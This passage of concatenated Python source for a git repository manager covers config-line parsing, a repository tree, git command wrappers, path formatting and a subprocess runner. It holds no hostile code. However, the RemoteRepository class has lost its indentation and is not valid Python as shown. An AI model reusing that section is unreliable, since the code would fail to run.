        """ Turns this ConfigLine into a string that can be re-parsed """
        return "".join([self.indent, "##", self.__pre, self.root,
                        self.__post])

    def __eq__(self, other: typing.Any) -> bool:
        """ Checks that this line is equal to another line """
        if not isinstance(other, RootLine):
            return False
        return (self.indent, self.root, self.__pre, self.__post) == \
            (other.indent, other.root, other.__pre, other.__post)
class BaseLine(ConfigLine):
    """ A line introducing a new BaseLine """

    def __init__(self, indent: str, depth: int, space_1: str, path: str,
                 space_2: str):
        """ Creates a new BaseLine instance """
        super().__init__(indent)
        self.__depth = depth
        self.__pre = space_1
        self.__path = path
        self.__post = space_2

    @property
    def depth(self) -> int:
        """ The depth of this BaseLine directive """
        return self.__depth

    @property
    def path(self) -> str:
        """ The path this BaseLine instance introduces """
        return self.__path

    def write(self) -> str:
        """ Turns this ConfigLine into a string that can be re-parsed """
        # the depth is encoded as a run of '>' characters
        arrows = ">" * self.depth
        return "".join([self.indent, arrows, self.__pre, self.path,
                        self.__post])

    def __eq__(self, other: typing.Any) -> bool:
        """ Checks that this line is equal to another line """
        if not isinstance(other, BaseLine):
            return False
        return (self.indent, self.depth, self.path, self.__pre,
                self.__post) == (other.indent, other.depth, other.path,
                                 other.__pre, other.__post)
class RepoLine(ConfigLine):
    """ a line representing a single repository """

    def __init__(self, indent: str, url: str, space_1: str, path: str,
                 space_2: str):
        """ Creates a new RepoLine instance """
        super().__init__(indent)
        self.__url = url
        self.__pre = space_1
        self.__path = path
        self.__post = space_2

    @property
    def url(self) -> str:
        """ The url this repo should be cloned from """
        return self.__url

    @property
    def path(self) -> str:
        """ The path this repo should be cloned into """
        return self.__path

    def write(self) -> str:
        """ Turns this ConfigLine into a string that can be re-parsed """
        return "".join([self.indent, self.url, self.__pre, self.path,
                        self.__post])

    def __eq__(self, other: typing.Any) -> bool:
        """ Checks that this line is equal to another line """
        if not isinstance(other, RepoLine):
            return False
        return (self.indent, self.url, self.path, self.__pre,
                self.__post) == (other.indent, other.url, other.path,
                                 other.__pre, other.__post)
--- FILE SEPARATOR ---
import typing
import os
from . import line
from ..repo import description as desc
from ..repo import implementation as impl
class Tree(object):
    """ Represents a Tree of Repositories """
    def __init__(self):
        """ Creates a new Tree object"""
        self.__lines = []
        # by default, both the base directory and the root are $HOME
        self.__base_directory = os.path.expanduser('~').rstrip("/")
        self.__root = self.__base_directory
    @property
    def lines(self) -> typing.List[line.ConfigLine]:
        """ the lines currently contained in this File """
        return self.__lines
    @property
    def descriptions(self) -> \
            typing.Generator[typing.Tuple[int, desc.Description], None, None]:
        """ an iterator for pairs of (line, description)

        The yielded integer is the index into self.lines, so callers may
        use it for insertion and removal. """
        # A stack for repo folders
        path_stack = [self.__base_directory]
        for (i, l) in enumerate(self.lines):
            if isinstance(l, line.BaseLine):
                # extract the current and new order of the lines
                current_order = len(path_stack)
                new_order = l.depth
                # we can not have a new order lower than 1 depth of the
                # current level
                if new_order > current_order:
                    raise Exception(
                        'Error in line {}: Missing base sublevel. '.format(
                            i + 1))
                # Read the sub-directory to be added and the old one
                sub_dir = os.path.expanduser(l.path)
                previous_item = path_stack[new_order - 1]
                # add the new sub-directory
                new_sub_dir = os.path.join(previous_item, sub_dir)
                path_stack[new_order:] = [new_sub_dir]
                # and yield it
                yield i, desc.BaseDescription(new_sub_dir)
            if isinstance(l, line.RepoLine):
                # Extract the base directory and the source url
                stack_loc = path_stack[-1]
                source_uri = l.url
                # And the path to clone to
                folder = os.path.expanduser(l.path) or None
                path = os.path.join(stack_loc, folder) \
                    if folder is not None else None
                # when no explicit folder is given, fall back to git's
                # 'humanish' name derived from the url
                name = path if path is not None else \
                    impl.RemoteRepository(source_uri).humanish_part()
                # and yield the actual repository
                yield i, desc.RepositoryDescription(
                    source_uri, os.path.join(stack_loc, name))
    @property
    def repositories(self) -> typing.Generator[desc.RepositoryDescription,
                                               None, None]:
        """ an iterator for all repositories """
        for (i, d) in self.descriptions:
            if isinstance(d, desc.RepositoryDescription):
                yield d
    @property
    def locals(self) -> typing.Generator[impl.LocalRepository, None,
                                         None]:
        """ an iterator for all localrepositories """
        for rd in self.repositories:
            yield rd.local
    @lines.setter
    def lines(self, ll: typing.List[line.ConfigLine]):
        """ sets the lines to be contained in this file

        Also re-scans for the first RootLine to update self.root. """
        for l in ll:
            if isinstance(l, line.RootLine):
                self.__root = os.path.join(self.__base_directory, l.root)
                break
        self.__lines = ll
    @property
    def root(self) -> str:
        """ The root of this repository"""
        return self.__root
    def index(self, d: desc.Description) -> typing.Optional[int]:
        """ Finds the index of a specific description inside of this Tree"""
        for (i, dd) in self.descriptions:
            if dd == d:
                return i
        return None
    def contains(self, d: desc.Description) -> bool:
        """ Checks if this repository contains a specific description """
        return self.index(d) is not None
    def insert_at(self, parent: typing.Optional[desc.BaseDescription],
                  d: desc.Description) -> int:
        """ Inserts a description at a given parent

        :param parent: Parent item to insert description at. If omitted,
        insert the item top-level
        :param d: Repository to insert
        :return: the index the item was inserted at
        :raises ValueError: if the parent does not exist or does not match
        """
        # are we inserting a base?
        insert_base = isinstance(d, desc.BaseDescription)
        # find the index to insert in
        # in the empty case, start at the top
        if parent is None:
            index = 0
            pdepth = 0
            indent = " "
        else:
            index = self.index(parent)
            if index is None:
                raise ValueError("Parent does not exist in Tree()")
            pdepth = self.lines[index].depth
            indent = self.lines[index].indent + " "
            index += 1
        # index to insert into
        insert_index = 0
        # A stack for repository patchs
        path_stack = [self.__base_directory]
        target_level = None
        # iterate through the lines
        # and find the last line
        for (i, l) in enumerate(self.lines):
            # only consider stopping once we are at or past the insertion
            # start index
            if i >= index:
                # if we have a base line we might have to quit
                if isinstance(l, line.BaseLine):
                    # if we are not inserting a base, break
                    if not insert_base:
                        break
                    # if we do not know our target level yet, we need to
                    # find it
                    if target_level is None:
                        target_level = len(path_stack)
                    # we need to break upon our target level
                    if l.depth < target_level:
                        break
            # if we have a repo line and have not reached our target
            # level, we can save the indent
            if isinstance(l, line.RepoLine) and target_level is None:
                indent = l.indent
            # else we might need to update our path
            elif isinstance(l, line.BaseLine):
                # extract the current and new order of the lines
                current_order = len(path_stack)
                new_order = l.depth
                # we can not have a new order lower than 1 depth of the
                # current level
                if new_order > current_order:
                    raise Exception(
                        'Error in line {}: Missing base sublevel. '.format(
                            i + 1))
                # Read the sub-directory to be added and the old one
                sub_dir = os.path.expanduser(l.path)
                previous_item = path_stack[new_order - 1]
                # add the new sub-directory
                new_sub_dir = os.path.join(previous_item, sub_dir)
                path_stack[new_order:] = [new_sub_dir]
            # and up the index to insert into
            insert_index = i + 1
        # the parent path is the path that is at the right most position
        ppath = path_stack[-1]
        # if we are inserting a repository, create an appropriate repo line
        if not insert_base:
            (base, item) = d.to_repo_line(indent, " ", "")
            if base.folder != ppath.rstrip("/"):
                raise ValueError("Cannot insert: Invalid Parent for "
                                 "RepositoryDescription. ")
        # if we are inserting a base description, we need to figure out paths
        else:
            npath = os.path.relpath(d.folder, ppath)
            # folders outside the parent path are written absolutely
            if (npath == '..' or npath.startswith('../')):
                npath = d.folder
            item = line.BaseLine(indent, pdepth + 1, " ", npath, "")
        # finally insert the item itself
        self.__lines.insert(insert_index, item)
        # and return the inserted index
        return insert_index
    def insert_base_or_get(self, b: desc.BaseDescription) -> int:
        """ Gets a BaseDescription index or inserts it recursively """
        # if we have the parent already, we are done
        index = self.index(b)
        if index is not None:
            return index
        # if we are inside of the base path, we can go recursively
        if os.path.commonprefix([b.folder, self.__base_directory]) == \
                self.__base_directory:
            # find the parent base description
            (ppath, _) = os.path.split(b.folder)
            # if we have reached the base, we do not need to create anything
            if ppath != self.__base_directory \
                    and b.folder != self.__base_directory:
                parent = desc.BaseDescription(ppath)
                # and create the parent
                self.insert_base_or_get(parent)
            else:
                parent = None
        # else, we need to insert top-level
        else:
            parent = None
        # and finally create our base
        return self.insert_at(parent, b)
    def insert_repo_or_get(self, r: desc.RepositoryDescription) -> int:
        """ Gets a RepositoryDescription index or inserts it recursively """
        # inserting an already existing repo
        index = self.index(r)
        if index is not None:
            return index
        # else, we need to create the parent
        # unless it is the base
        (parent, _) = r.to_repo_line("", "", "")
        if parent.folder == self.__base_directory:
            parent = None
        else:
            self.insert_base_or_get(parent)
        # and then insert it
        return self.insert_at(parent, r)
    def rebuild(self):
        """ Rebuilds this configuration file by re-inserting all
        repository descriptions from scratch """
        # get all the repository descriptions
        repos = list(self.repositories)
        # wipe all the lines
        self.lines = []
        # if the root is not the base directory, insert it.
        if self.root != self.__base_directory:
            relroot = os.path.relpath(self.root, self.__base_directory)
            if relroot.startswith('..'):
                relroot = self.root
            self.lines.append(line.RootLine('', '', relroot, ''))
        # and re-insert all of the repos
        for r in repos:
            self.insert_repo_or_get(r)
    def remove_local(self, local: impl.LocalRepository) -> bool:
        """ Remove a local repository from a configuration file
        provided it exists

        :return: True if a matching repository was found and removed
        """
        index = None
        # search for the local repository
        for (i, dd) in self.descriptions:
            if isinstance(dd, desc.RepositoryDescription) and \
                    dd.local == local:
                index = i
                break
        # if we did not find it, return
        if index is None:
            return False
        # and remove the given index
        # (the re-assignment below runs the lines setter, which re-scans
        # the remaining lines for a RootLine)
        lines = self.lines
        del self.lines[index]
        self.lines = lines
        return True
    def find(self, pattern) -> typing.Generator[desc.Description, None, None]:
        """ Finds all repositories subject to a given description. """
        for r in self.repositories:
            if r.remote.matches(pattern):
                yield r
--- FILE SEPARATOR ---
#!/usr/bin/env python3
import argparse
from GitManager.utils import format
from GitManager.config import file
from GitManager.commands import status, lister, fetch, setup, pull, state, \
push, reconfigure, gc, clone
def main(args):
    """ The main entry point for git-manager

    :param args: Command line arguments, passed along to real_main()
    :return: an integer exit code
    """
    try:
        # BUGFIX: propagate the exit code -- previously real_main()'s
        # return value was discarded, so failures exited with status 0
        return real_main(args)
    except BrokenPipeError:
        return 2
    except KeyboardInterrupt:
        print("\n{}".format(
            format.Format.red("Received KeyboardInterrupt")
        ))
        return 2
    except Exception as e:
        # top-level boundary: report any unexpected error instead of
        # showing the user a raw traceback
        print("\n{}".format(
            format.Format.red("Unknown error: {}".format(e))
        ))
        return 3
def real_main(args):
    """ Main entry point for the program -- may throw errors

    :param args: Command line arguments
    :return: an integer exit code (0 on success)
    """
    ACTIONS = ['help', 'setup', 'clone', 'fetch', 'pull', 'push', 'gc', 'ls',
               'status', 'state', 'reconfigure']

    # Create an argument parser
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument("action", nargs='?',
                        help="Action to perform. One of '{}'. ".format(
                            "', '".join(ACTIONS)))
    # NOTE(review): the 'args' parameter is shadowed here --
    # parse_known_args() reads sys.argv directly; confirm before changing
    args, command_args = parser.parse_known_args()

    # Find the configuration file
    cfg_file = file.File.find()

    # Check that we have a configuration file.
    if cfg_file is None:
        print(format.Format.red("Missing configuration file. "))
        return 1

    # read the list of repositories
    config = file.File(cfg_file)
    try:
        config.read()
    # BUGFIX: only catch real errors -- the previous bare 'except:' also
    # swallowed KeyboardInterrupt and SystemExit
    except Exception:
        print(format.Format.red("Unable to read configuration file. "))
        return 1

    line = format.TerminalLine()
    repos = list(config.repositories)

    # dispatch to the selected sub-command
    if args.action == 'help' or args.action is None:
        parser.print_help()
    elif args.action == 'setup':
        setup.Setup(line, repos, *command_args)()
    elif args.action == 'clone':
        clone.Clone(line, config, *command_args)()
    elif args.action == 'fetch':
        fetch.Fetch(line, repos, *command_args)()
    elif args.action == 'pull':
        pull.Pull(line, repos, *command_args)()
    elif args.action == 'push':
        push.Push(line, repos, *command_args)()
    elif args.action == 'gc':
        gc.GC(line, repos, *command_args)()
    elif args.action == 'ls':
        lister.LsLocal(line, repos, *command_args)()
    elif args.action == 'status':
        status.Status(line, repos, *command_args)()
    elif args.action == 'state':
        state.State(line, repos, *command_args)()
    elif args.action == 'reconfigure':
        import sys
        # reconfigure may print the new configuration to STDOUT, so its
        # progress output goes to STDERR instead
        line = format.TerminalLine(fd=sys.stderr)
        reconfigure.Reconfigure(line, config, *command_args)()
    else:
        print('Unknown command %r' % (args.action,))
        return 1

    return 0
__all__ = ["main"]
--- FILE SEPARATOR ---
import collections
import os
import typing
from . import implementation
from ..config import line
from abc import ABCMeta
class Description(metaclass=ABCMeta):
    """ Abstract base class shared by all description types; concrete
    description classes are attached via Description.register(). """
    pass
@Description.register
class BaseDescription(collections.namedtuple("BaseDescription", ["folder"])):
    """ A 'description' of a base folder in the configuration file. """
    # 'folder' is the path of the directory this base directive refers to
    pass
@Description.register
class RepositoryDescription(collections.namedtuple("RepositoryDescription",
                                                   ["source", "path"])):
    """A 'description' of a repository in the configuration file, i.e. a
    a pair of (source, path) """

    @property
    def local(self) -> implementation.LocalRepository:
        """ Gets the local repository associated to this
        RepositoryDescription """
        return implementation.LocalRepository(self.path)

    @property
    def remote(self) -> implementation.RemoteRepository:
        """ Gets the remote repository associated to this
        RepositoryDescription """
        return implementation.RemoteRepository(self.source)

    def to_repo_line(self, indent: str, space_1: str, space_2: str) -> \
            typing.Tuple[BaseDescription, line.RepoLine]:
        """ Turns this RepositoryDescription into an appropriate RepoLine
        and description. """
        # split the clone path into its parent folder and target name
        (parent, name) = os.path.split(self.path)

        # when the name equals git's 'humanish' part of the url, the line
        # does not need to spell the name out explicitly
        if self.remote.humanish_part() == name:
            repo_line = line.RepoLine(indent, self.source, '', '', space_2)
        else:
            repo_line = line.RepoLine(indent, self.source, space_1, name,
                                      space_2)

        return BaseDescription(parent), repo_line
--- FILE SEPARATOR ---
import typing
from . import description, implementation
import os.path
class Finder(object):
    """ Class that helps finding existing repositories """

    @staticmethod
    def find_recursive(path: str,
                       allow_links: bool=False,
                       continue_in_repository: bool=False,
                       callback:
                       typing.Callable[[str], None]=lambda s: None) \
            -> typing.Generator[description.RepositoryDescription, None,
                                None]:
        """ Finds all repositories within a specific path

        :param path: Paths of repository to find
        :param allow_links: If True, continue searching in repositories even
        if they are symlinked. Use with caution, as this might cause the
        routine to run into a infinite loop
        :param continue_in_repository: If True, instead of stopping the
        recursing inside a repository, continue searching for
        sub-repositories
        :param callback: Optional callback to call when scanning a given
        directory.
        """
        # tell the caller which directory is being scanned
        callback(path)

        # do not descend into symlinked directories unless explicitly allowed
        if not allow_links and os.path.islink(path):
            return

        # yield the repository located at this path, if there is one
        found_repo = False
        try:
            yield Finder.get_from_path(path)
            found_repo = True
        except ValueError:
            pass

        # stop at the repository boundary unless told otherwise
        if found_repo and not continue_in_repository:
            return

        # recurse into every sub-directory
        for entry in os.listdir(path):
            candidate = os.path.join(path, entry)
            if os.path.isdir(candidate):
                yield from Finder.find_recursive(
                    candidate,
                    allow_links=allow_links,
                    continue_in_repository=continue_in_repository,
                    callback=callback)

    @staticmethod
    def get_from_path(path: str) -> description.RepositoryDescription:
        """ Gets a single repository given a path if it exists

        :param path: Path to find repository at
        :raises ValueError: if there is no repository (or no remote) at path
        """
        local = implementation.LocalRepository(path)
        if not local.exists():
            raise ValueError("No repository available in {}".format(path))

        # prefer the 'origin' remote; fall back to the first remote listed
        try:
            remote_url = local.get_remote_url('origin')
        except ValueError:
            remotes = local.remotes
            if len(remotes) == 0:
                raise ValueError('No remotes available')
            remote_url = local.get_remote_url(remotes[0])

        return description.RepositoryDescription(remote_url, path)
--- FILE SEPARATOR ---
import os
import re
import enum
import typing
import fnmatch
from ..utils import run
class RemoteStatus(enum.Enum):
    """ Remote uplink status"""
    # local and remote point at the same commit
    UP_TO_DATE = "ok"
    # the remote has commits missing locally -- a 'git pull' is needed
    REMOTE_NEWER = "pull"
    # the local branch has commits missing remotely -- a 'git push' is needed
    LOCAL_NEWER = "push"
    # local and remote histories have diverged -- merge or rebase needed
    DIVERGENCE = "divergence"
class LocalRepository(object):
    """ Represents a local repository identified by a path """
    def __init__(self, path: str):
        """ Creates a new LocalRepository

        :param path: Path to the working directory; normalised immediately
        so that equality checks are not sensitive to trailing slashes etc.
        """
        self.__path = os.path.normpath(path)
    def __eq__(self, other: typing.Any) -> bool:
        """ Checks if this LocalRepository is equal to another"""
        return isinstance(other, LocalRepository) and other.path == self.path
    @property
    def remotes(self) -> typing.List[str]:
        """ A list of remotes that this RemoteRepository has """
        # 'git remote show -n' prints one remote name per line
        remotes = run.GitRun("remote", "show", "-n", cwd=self.path)
        remotes.wait()
        # NOTE(review): the output ends with a newline, so this list carries
        # a trailing empty string -- confirm callers before changing this
        return remotes.stdout.read().decode("utf-8").split("\n")
    def get_remote_url(self, name: str) -> str:
        """ Get the url of a remote

        :param name: Name of the remote to look up
        :raises ValueError: if git does not know the given remote
        """
        # get the url of a remote
        remote_url = run.GitRun("remote", "get-url", name, cwd=self.path)
        # throw an exception if we fail
        if not remote_url.success:
            raise ValueError("Unable to find remote {}".format(name))
        # else return the url (first line of the output only)
        return remote_url.stdout.read().decode("utf-8").split("\n")[0]
    @property
    def path(self) -> str:
        """ The path to this repository """
        return self.__path
    def upstream_ref(self, ref: str) -> str:
        """ Gets the upstream being tracked by a given path

        :param ref: Ref to get upstream of.
        """
        refs = run.GitRun("for-each-ref", "--format=%(upstream:short)", ref,
                          cwd=self.path)
        refs.wait()
        return refs.stdout.read().decode("utf-8").split("\n")[0]
    def symbolic_ref(self, ref: str) -> str:
        """ Gets the symbolic ref REF is pointing to

        :param ref: Ref to parse
        """
        refs = run.GitRun("symbolic-ref", "-q", ref, cwd=self.path)
        refs.wait()
        return refs.stdout.read().decode("utf-8").split("\n")[0]
    def ref_parse(self, ref: str) -> str:
        """ Normalises a ref by parsing it in a short form

        :param ref: Ref to parse
        """
        refs = run.GitRun("rev-parse", ref, cwd=self.path)
        refs.wait()
        return refs.stdout.read().decode("utf-8").split("\n")[0]
    def __str__(self) -> str:
        """ The path of this repository """
        return self.path
    def __repr__(self):
        return "<{} {}>".format(self.__class__.__name__, str(self))
    def exists(self) -> bool:
        """ Checks if this repository exists """
        # check if the directory exists
        if not os.path.isdir(self.path):
            return False
        # try to get the toplevel
        rev_parse_run = run.GitRun("rev-parse", "--show-toplevel",
                                   cwd=self.path)
        # if we did not succeed, we are not inside a git repo
        if not rev_parse_run.success:
            return False
        # get the actual toplevel
        toplevel = rev_parse_run.stdout.read().decode("utf-8").split("\n")[0]
        # and check that it is equal to the normal path
        # (this rejects paths that merely live INSIDE some repository)
        return os.path.normpath(toplevel) == self.path
    def gc(self, *args: str) -> bool:
        """ Runs housekeeping tasks on this repository

        :param args: Arguments to pass along to the housekeeping command
        """
        return run.GitRun("gc", *args, cwd=self.path, pipe_stderr=True,
                          pipe_stdin=True, pipe_stdout=True).success
    def fetch(self) -> bool:
        """ Fetches all remotes from this repository"""
        return run.GitRun("fetch", "--all", "--quiet", cwd=self.path,
                          pipe_stdin=True, pipe_stdout=True,
                          pipe_stderr=True).success
    def pull(self) -> bool:
        """ Pulls all remotes from this repository"""
        return run.GitRun("pull", cwd=self.path, pipe_stdin=True,
                          pipe_stdout=True, pipe_stderr=True).success
    def push(self) -> bool:
        """ Pushes this repository """
        return run.GitRun("push", cwd=self.path, pipe_stdin=True,
                          pipe_stdout=True, pipe_stderr=True).success
    def local_status(self) -> typing.Optional[str]:
        """ Shows status on this git repository

        :return: the porcelain status output ('' when the working tree is
        clean), or None when this repository does not exist
        """
        if not self.exists():
            return None
        # Check for the status first
        cmd = run.GitRun("status", "--porcelain", cwd=self.path)
        cmd.wait()
        # return the porcelain info
        return cmd.stdout.read().decode("utf-8")
    def remote_status(self, update=False) -> typing.Optional[RemoteStatus]:
        """ Shows status on this repository, and in particular if it is
        out-of-date with the remote

        :param update: Boolean indicating if we should update using git
        remote update first
        """
        # if we do not exist, return
        if not self.exists():
            return None
        # if we should update, run git remote update
        if update:
            if not run.GitRun("remote", "update", cwd=self.path).success:
                return None
        # where is head pointing to?
        localref = self.ref_parse("HEAD")
        # what is our upstream?
        upstream = self.upstream_ref(self.symbolic_ref("HEAD"))
        remoteref = self.ref_parse(upstream)
        # check where we would merge
        refs = run.GitRun("merge-base", localref, remoteref, cwd=self.path)
        refs.wait()
        baseref = refs.stdout.read().decode("utf-8").split("\n")[0]
        # if both references are identical, we are ok
        if localref == remoteref:
            return RemoteStatus.UP_TO_DATE
        # if we would start with the local base, we would have to pull
        elif localref == baseref:
            return RemoteStatus.REMOTE_NEWER
        # if we would start with the remote base, we would have to push
        elif remoteref == baseref:
            return RemoteStatus.LOCAL_NEWER
        # else we have divergence and something is wrong.
        else:
            return RemoteStatus.DIVERGENCE
class RemoteRepository(object):
""" Represents a remote repository identified by a url """
def __init__(self, url: str):
""" creates a new RemoteRepository()
:param url: URL to remote repository
"""
self.__url = url
def __eq__(self, other: typing.Any) -> bool:
""" Checks if this LocalRepository is equal to another"""
return isinstance(other, RemoteRepository) and other.url == self.url
@property
def url(self) -> str:
""" the url to this repository """
return self.__url
def __str__(self) -> str:
return self.url
def __repr__(self):
return "<{} {}>".format(self.__class__.__name__, str(self))
def exists(self) -> bool:
""" Checks if this remote repository exists """
return run.GitRun("ls-remote", "--exit-code", self.url).success
def clone(self, local: LocalRepository, *args: typing.Tuple[str]) -> bool:
""" Clones this repository into the path given by a local path"""
return run.GitRun("clone", self.url, local.path, *args,
pipe_stdin=True, pipe_stdout=True,
pipe_stderr=True).success
def components(self) -> typing.List[str]:
"""
Extracts the components of this URL, i.e. a set of items that uniquely
identifies where this repository should go.
"""
# Trim a trailing '.git'
if self.url.endswith('.git'):
url = self.url[:-4]
else:
url = self.url
# Trim trailing '/'s
while url.endswith('/'):
url = url[:-1]
if '://' in url:
# [$PROTOCOL]:$PREFIX/$COMPONENTS
url = '://'.join(url.split('://')[1:])
parts = re.split(r"[\\/:]", url)
(prefix, rest) = (parts[0], '/'.join(parts[1:]))
else:
# $PREFIX:$COMPONENTS
parts = url.split(':')
(prefix, rest) = (parts[0], ':'.join(parts[1:]))
# read (user, host) from the prefix
if '@' in prefix:
parts = prefix.split('@')
(user, host) = (parts[0], '@'.join(parts[1:]))
else:
user = None
host = prefix
# if user is 'git' or 'gogs', ignore it
if user in ['git', 'gogs']:
user = None
# prepare to prepend prefix
if user is not None:
prefix = [host, user]
else:
prefix = [host]
# and split into '/'s
return prefix + re.split(r"[\\/:]", rest)
def matches(self, pattern: str) -> bool:
""" Checks if a repository matches a given pattern"""
# lowercase the pattern
pattern = pattern.lower()
# split the pattern into components
if ':' in pattern:
pattern_components = RemoteRepository(pattern).components()
else:
pattern = ':' + pattern
pattern_components = RemoteRepository(pattern).components()[1:]
# count and reassemble
pattern_length = len(pattern_components)
pattern = '/'.join(pattern_components)
# get the components of the current repo
components = list(map(lambda pc: pc.lower(), self.components()))
components_length = len(components)
# iterate over all sub-paths of the given length
for i in range(components_length - pattern_length + 1):
suburl = '/'.join(components[i:i + pattern_length])
if fnmatch.fnmatch(suburl, pattern):
return True
return False
def humanish_part(self) -> str:
    """
    Returns the 'humanish' part of this URL, i.e. the final component
    of the repository location (see `man git-clone` for details).
    """
    # the last component is the repository name itself
    return self.components()[-1]
--- FILE SEPARATOR ---
import shutil
import sys
from os import path
class Format(object):
    """ Static helpers for coloring text and shortening paths. """

    def __init__(self):
        """ Prevents creation of Format() -- this class is a namespace. """
        raise TypeError("Format() can not be instantiated")

    @staticmethod
    def red(prt: str) -> str:
        """ Formats a string in red. """
        return "\033[91m{}\033[00m".format(prt)

    @staticmethod
    def yellow(prt: str) -> str:
        """ Formats a string in yellow. """
        return "\033[93m{}\033[00m".format(prt)

    @staticmethod
    def green(prt: str) -> str:
        """ Formats a string in green. """
        return "\033[92m{}\033[00m".format(prt)

    @staticmethod
    def cyan(prt: str) -> str:
        """ Formats a string in cyan. """
        return "\033[96m{}\033[00m".format(prt)

    @staticmethod
    def short_abs_path(pth: str, length: int) -> str:
        """ Formats an absolute path with a maximum length

        :param pth: Absolute path to format
        :param length: Maximal length of the path (at least 6)
        :raises ValueError: if length < 6 or pth is not absolute
        """
        # too small length
        if length <= 5:
            raise ValueError('Length must be at least 6')
        # check that we have an absolute path
        if not pth.startswith('/'):
            raise ValueError('pth must be an absolute path')
        #
        # Step 1: Normalise the path
        #
        pth = path.normpath(pth)
        # BUGFIX: use <= (was <) so a path of exactly `length` characters
        # is returned unshortened, consistent with short_rel_path()
        if len(pth) <= length:
            return pth
        #
        # Step 2: If inside $HOME, use a relative path instead of an
        # absolute one
        #
        # find the path relative to the $HOME directory of the user
        relative_path = path.relpath(pth, path.expanduser('~'))
        # if we are outside the home directory, keep the absolute form
        if relative_path.startswith('./') or relative_path.startswith(
                '../') \
                or relative_path == '.' or relative_path == '..':
            prefix = '/'
            pth = pth[1:]
        else:
            prefix = '~/'
            pth = relative_path
        #
        # Step 3: Format a short path
        #
        return prefix + Format.short_rel_path(pth, length - len(prefix))

    @staticmethod
    def short_rel_path(pth: str, length: int) -> str:
        """ Formats a relative path with a maximum length

        :param pth: Relative path to format
        :param length: Maximal length of the path (at least 4)
        :raises ValueError: if length < 4 or pth is absolute
        """
        # too small length
        if length <= 3:
            raise ValueError('Length must be at least 4')
        # check that we have a relative path
        if pth.startswith('/'):
            raise ValueError('pth must be a relative path')
        #
        # Step 1: Normalise the path
        #
        pth = path.normpath(pth)
        if len(pth) <= length:
            return pth
        #
        # Step 2: Iteratively try replacing middle components by '...'
        #
        pth_components = pth.split('/')
        # try shortening components
        while len(pth_components) > 2:
            # if the long path is ok, just return it
            if len(pth) <= length:
                return pth
            # figure out the component to remove
            rmidx = int(len(pth_components) / 2)
            # build a new path
            pth = '/'.join(pth_components[:rmidx] + ['...'] + pth_components[
                (rmidx + 1):])
            # and update the components array
            pth_components = pth_components[:rmidx] + pth_components[
                (rmidx + 1):]
        #
        # Step 3: Fallback to just taking a substring
        #
        # if the long path is ok now, just return it
        if len(pth) <= length:
            return pth
        # if we still haven't gotten a path that is short enough
        # we will have to remove parts from within one component
        # extract first and last component
        # BUGFIX: use index -1 (was 1) so a path made of a single overlong
        # component no longer raises an IndexError here
        begin = pth_components[0]
        end = pth_components[-1]
        # the number of characters we will get to keep
        keepidx = length - 3
        # shorten the longer component, as it likely is accurate enough
        # even without the extra information
        if len(begin) < len(end):
            return pth[:keepidx] + '...'
        else:
            return '...' + pth[-keepidx:]

    @staticmethod
    def short_path(pth: str, length: int) -> str:
        """ Formats a path with a maximum length

        If pth is known to be absolute or non-absolute use short_abs_path()
        or short_rel_path() instead.

        :param pth: Path to format
        :param length: Maximal length of the path (at least 6)
        :raises ValueError: if length < 6
        """
        # too small length
        if length <= 5:
            raise ValueError('Length must be at least 6')
        if pth.startswith('/'):
            return Format.short_abs_path(pth, length)
        else:
            return Format.short_rel_path(pth, length)
class TerminalLine(object):
    """ Represents a Terminal Line that can be re-written"""

    def __init__(self, fd=None):
        """ Creates a new TerminalLine object.

        :param fd: File descriptor of output to use
        """
        # write to stdout unless told otherwise
        self.__stream = sys.stdout if fd is None else fd
        # text buffered while the stream is not a terminal
        self.__buffer = ""

    @property
    def width(self):
        """
        :return: the width of this line in number of characters
        :rtype: int
        """
        return shutil.get_terminal_size().columns

    def clean(self):
        """ Cleans the current line of content. """
        if not self.__stream.isatty():
            # nothing was flushed yet -- simply drop the buffered text
            self.__buffer = ""
        else:
            # overwrite the entire line with spaces and return the
            # cursor to the beginning
            self.append('\r%s\r' % (' ' * self.width))

    def linebreak(self):
        """ Inserts a LineBreak into this line. """
        self.append('\n')

    def write(self, s: str):
        """ Writes a string to this Line, overwriting the current content.

        :param s: String to write to the line.
        :type s: str
        """
        self.clean()
        self.append(s)

    def append(self, s: str):
        """ Appends text to this TerminalLine instance. """
        if self.__stream.isatty():
            # terminals can be rewritten in place -- write directly
            self.__stream.write(s)
        else:
            # otherwise buffer until a complete line is available
            self.__buffer += s
        # and flush the content
        self.flush()

    def flush(self):
        """ Flushes this TerminalLine. """
        # for non-terminals, emit only completed lines from the buffer
        if not self.__stream.isatty():
            while "\n" in self.__buffer:
                cut = self.__buffer.index('\n') + 1
                self.__stream.write(self.__buffer[:cut])
                self.__buffer = self.__buffer[cut:]
        # delegate to the underlying flush implementation
        self.__stream.flush()
__all__ = ["Format", "TerminalLine"]
--- FILE SEPARATOR ---
import typing
import enum
import subprocess
import os
class ProcessRunState(enum.Enum):
    """ The lifecycle states a process run can be in. """

    # created, but not yet started
    NEW = 'new'
    # started and still running
    ACTIVE = 'active'
    # started and finished running
    TERMINATED = 'terminated'
class ProcessRun(object):
    """ Represents a single call to an external Executable """

    def __init__(self, exe: str, *args: str,
                 cwd: typing.Optional[str] = None, pipe_stdout: bool = False,
                 pipe_stderr: bool = False, pipe_stdin: bool = False,
                 environment: typing.Optional[dict] = None):
        """
        :param exe: Executable or command to run
        :param args: Arguments to the executable.  (BUGFIX: per PEP 484 a
        ``*args`` parameter is annotated with its element type ``str``,
        not ``typing.List[str]``.)
        :param cwd: Working directory of the call. Defaults to the
        current working directory
        :param pipe_stdout: should we pipe stdout to the parent?
        :param pipe_stderr: should we pipe stderr to the parent?
        :param pipe_stdin: should we pipe stdin from the parent?
        :param environment: The environment of this process or None if it
        should be inherited from the parent
        """

        self.__exe = exe
        self.__args = list(args)
        self.__cwd = cwd if cwd is not None else os.getcwd()

        self.__pipe_stdout = pipe_stdout
        self.__pipe_stdin = pipe_stdin
        self.__pipe_stderr = pipe_stderr

        self.__environment = environment if environment is not None else \
            os.environ.copy()

        # Has the process been started?
        self.__started = False

        # The Popen handle of the process
        self.__handle = None  # type: subprocess.Popen

    #
    # PROPERTIES
    #

    @property
    def exe(self) -> str:
        """ Command (executable) to run in this process run """
        # TODO: Do we want to have a which() here?
        return self.__exe

    @property
    def args(self) -> typing.List[str]:
        """ arguments given to this command """
        return self.__args

    @property
    def cwd(self) -> str:
        """ working directory of this process run """
        return self.__cwd

    @property
    def environment(self) -> dict:
        """ environment of this process """
        return self.__environment

    #
    # INPUT / OUTPUT
    #

    @property
